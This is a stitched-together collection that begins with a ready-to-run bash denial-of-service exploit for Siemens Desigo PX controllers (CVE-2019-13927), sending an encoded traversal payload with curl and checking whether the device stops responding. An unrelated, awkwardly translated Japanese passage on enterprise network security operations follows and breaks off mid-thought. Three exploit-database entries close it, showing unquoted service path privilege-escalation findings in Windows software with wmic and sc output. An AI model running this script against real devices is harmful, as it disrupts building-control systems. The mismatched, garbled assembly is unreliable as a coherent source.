# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#
echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
echo -ne "\nUsage: $0 [ipaddr]\n\n"
exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
echo -ne "\n[*] Exploit successful!\n"
else
echo -ne "\n[-] Exploit unsuccessful.\n"
exit
fi
イントラネットセキュリティ操作
イントラネットセキュリティ操作とは、会社の内部生産オフィスネットワークを指します。一般的に、従来の企業は、生産ネットワーク(産業制御ネットワーク)を指し、オフィスネットワークは一般に、企業の内部システム(ドキュメントサーバー、OAシステム、金融、特許、人事、その他のビジネスシステム)および従業員のオフィスコンピューターネットワークを指します。インターネットまたはITエンタープライズの場合、生産ネットワークは一般に外部の世界(公式ウェブサイト、メインサイト、CDNなど)にのみサービスを提供し、オフィスネットワークは従来の企業と一致しており、テストネットワークはテスト環境の開発に使用されるネットワークを指します。インターネットまたはITエンタープライズの3つのネットワークを分離することをお勧めします。
生産ネットワークセキュリティ操作
生産ネットワークの場合、採用された運用戦略はオフィスイントラネットの戦略と似ていますが、ビジネスのアイデアは異なります。第一に、生産ネットワークは企業のライフラインであり、金融機関が主催するオフィスネットワークと同様に、ビジネスを分解することはできません。したがって、まず第一に、ビジネスの可用性とビジネスデータの確保を検討してください。ダブルコピーシステムまたは複数のシステムを達成することをお勧めします。見つかった脆弱性については、まだオンラインでサービスを提供していないバックアップノードを修復することが優先されます。修理が成功した後、メインノードとバックアップノードが交換され、元のメインノードと現在のバックアップノードが修復されます。さらに、生産ネットワークは最も安定している必要があります。ビジネスに必要なポートのみを外部から開設する必要があります。オフィスネットワークから内部的にアクセスした生産ネットワークは、完全な認証と監査を実現するために、要塞マシンに渡す必要があります。
オフィスイントラネットセキュリティ操作
Office Intranetの場合、高防御ゾーンを形成する必要があります。 AD、DHCP、DNS、OA、電子メール、ERP、CRM、特許、財務、採用、法律問題、投資、ドキュメント、IMコミュニケーション、Wiki、プロジェクト、バージョンコントロールなどの主要な敏感なシステムは、ハイディフェンスゾーンに配置する必要があります。ログを完全に収集し、監査と早期警告監視を確保し、これらのシステムの保護に焦点を当てます。これらのシステムは、外部からビジネス需要ポートを開発するだけです。ゲートウェイネットワークセグメント(メンテナンスネットワーク)は、アクセス権限を個別に設定し、イントラネットロジックから分離する必要があります。基本的な従業員ホストの場合、多くのガードやバトラーなどの統一HIDS製品を装備する必要があります。これらのHIDSコントロールノードをイントラネットで操作するのが最適です。
ネットワークセキュリティ操作をテスト
一般に、テストネットワークに厳密なセキュリティポリシーの制限を実装することは推奨されませんが、テストネットワーク(Bastion Machine)のアクセス権とアクセス方法は、ホワイトリスト制御を実現するために厳密に制限する必要があり、テストサービスはオフィスネットワークと生産ネットワークに接続されていません。
安全操作の初期焦点
脆弱性とイベント処理
上記の2つは基本的に三段論法、発見とディスポスの改善
に過ぎません
# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
# Date: 2019-11-14
# Exploit Author: D.Goedecke
# Vendor Homepage: www.shrew.net
# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
# Version: 2.2.2
# Tested on: Windows 10 64bit
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ShrewSoft IKE Daemon iked C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto
ShrewSoft IPSEC Daemon ipsecd C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto
C:\Users\user>sc qc iked
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: iked
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ShrewSoft IKE Daemon
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc qc ipsecd
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ipsecd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ShrewSoft IPSEC Daemon
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """
FxControl Runtime FxControlRuntime C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe Auto
# Service info:
C:\>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FxControlRuntime
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FxControl Runtime
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version: 1.00.31
# Tested on: Windows 10 Pro x64 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
POC:
>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ASUS HM Com Service asHmComSvc
C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
Auto
>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: asHMComSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS HM Com Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem